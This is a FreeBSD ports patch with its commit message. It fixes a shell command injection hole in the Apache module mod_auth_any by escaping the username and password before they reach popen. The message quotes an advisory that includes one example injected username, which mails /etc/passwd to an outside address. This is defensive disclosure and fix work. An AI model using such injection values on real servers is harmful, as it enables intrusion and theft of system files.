kpriv/freebsd-ports
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity
freebsd-ports/www/mod_auth_any/files/patch-mod_auth_any.c
Mario Sergio Fujikawa Ferreira 0025bdf0b2 o Fix vulnerability that allows execution of arbitrary commands on 
the server with the uid of the apache process. Background [1]:

"The module accepts a username and password from the web client,
passes them to a user-space executable (using popen(3), which invokes
a shell) and waits for a response in order to authenticate the user.
The password is quoted on the popen() command line to avoid
interpretation of shell special chars, but the username is not.
Thus a malicious user can execute commands by supplying an appropriately
crafted username. (e.g. "foo&mail me@my.home</etc/passwd")

"The problem is easily fixed by adding quotes (and escaping any
quotes already present) to the username and password in the popen
command line."

o Fix this by adding a escaping function from [2]. Then, modifying
  this function appropriately with ideas from [3]. Apply the new
  escaping code to mod_auth_any.
o Bump PORTREVISION

Submitted by:	Security Officer (nectar),
		Red Hat Security Response Team <security@redhat.com> [1]
Obtained from:	mod_auth_any CVS [2],
		nalin@redhat.com [3]
2003-03-25 04:23:11 +00:00

37 lines
1.2 KiB
C
Raw Blame History

--- mod_auth_any.c.orig Tue Jan 9 05:48:20 2001
+++ mod_auth_any.c Tue Mar 25 01:09:55 2003
@@ -121,6 +121,7 @@
*/
+char* bash_single_quote_escape_string(const char *);
/* NB: debugging stuff */
extern int errno;
@@ -180,13 +181,25 @@
const char *rpw, *w;
FILE* ext_authprog;
FILE* fp;
+ char *escaped_user, *escaped_password;
l = (char*) malloc (MAX_STRING_LEN * sizeof(char));
+ memset (l, '\0', MAX_STRING_LEN);
execstr = (char*) malloc (MAX_STRING_LEN * sizeof(char));
setenv ("REMOTE_ADDR", r -> connection -> remote_ip, 1);
+
+ /* escape the user name and the password */
+ escaped_user = bash_single_quote_escape_string(user);
+ escaped_password = bash_single_quote_escape_string(password);
+
/* open the program stream */
- snprintf (execstr, MAX_STRING_LEN, "%s %s \"%s\"", auth_pwfile, user, password);
+ snprintf (execstr, MAX_STRING_LEN, "%s %s %s", auth_pwfile, escaped_user, escaped_password);
+
+ /* free the escaped user and password before we forget */
+ free(escaped_user);
+ free(escaped_password);
+
if (!(ext_authprog = popen (execstr, "r"))) {
ap_log_rerror (APLOG_MARK, APLOG_ERR, r, "Could not popen() on program: %s: %s",
Reference in a new issue View git blame Copy permalink